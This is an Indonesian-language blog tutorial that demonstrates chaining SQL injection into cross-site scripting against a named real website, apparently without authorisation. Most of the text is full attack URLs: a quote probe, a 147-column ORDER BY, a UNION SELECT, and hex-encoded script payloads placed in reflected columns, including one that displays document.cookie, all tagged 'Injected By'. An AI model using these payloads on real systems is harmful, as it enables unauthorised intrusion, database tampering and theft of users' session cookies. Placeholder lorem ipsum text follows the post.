SQL Injection to XSS #1

-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL Injection To XSS
-

Apasih SQL Injection To XSS?
SQL Injection To XSS adalah SQL Injection biasa yang dimana saat tahap union select dan mendapat angka togel, angka togel tersebut di manfaatkan untuk mendapatkan alert dan prompt xss dengan mengconvert code xss tersebut lalu menaruh nya di angka togel.
Menurut saya :'v

Lalu bagaimana cara melakukannya? Let's do it with me.

Target : skyfood.us
Disini saya langsung memasukan tahap injeksi saja, agar tidak teslalu lama.

> Kita coba taruh single quote atau apalah itu.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122'

Maka akan terlihat berbeda dengan page normal nya.
> lanjut kita order by untuk menentukan batas column.
> disini saya sudah tau batas column di angka 147. Agar tidak terlalu lama. Bila ada yang belum tau cara menentukan batas column, kalian bisa cek artikel sebelumnya SQL Injection manual.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -

> banyak sekali.
> sekarang kita union select untuk mendapatkan angka togel nya.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> dan kita di beri angka 4,32,78,79,91,92,93,94,95,96,97 untuk di gunakan.
> sekarang kita akan melakukan SQL Injection To XSS. dengan memasukan code :
<script>alert('1');</script>
Dan mengconvert nya, lalu membungkusnya dengan concat.

Contoh :
concat(<script>alert('Injected By 1K4lL_*');</script>)
Convert atau encode menjadi hex :
concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e)

> taruh di angka togel. Contoh :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> berhasil.
> sekarang kita coba get cookie and domain menggunakan prompt.
Contoh :
concat(<script>prompt('Injected By 1K4lL_*',document.cookie);</script>
Convert atau encode menjadi hex :
concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e)

> Taruh di angka togel. Contoh :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> berhasil.
> jika ingin get domain, kalian tinggal mengganti nya menjadi :
concat(<script>prompt('Injected By 1K4lL_*',document.domain);</script>)
Lalu encode dan tempel di angka togel.

Okeh, sekian dari saya. Next article saya akan membuat SQL Injection To XSS dump basic statement in alert.
Thanks
See u
Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.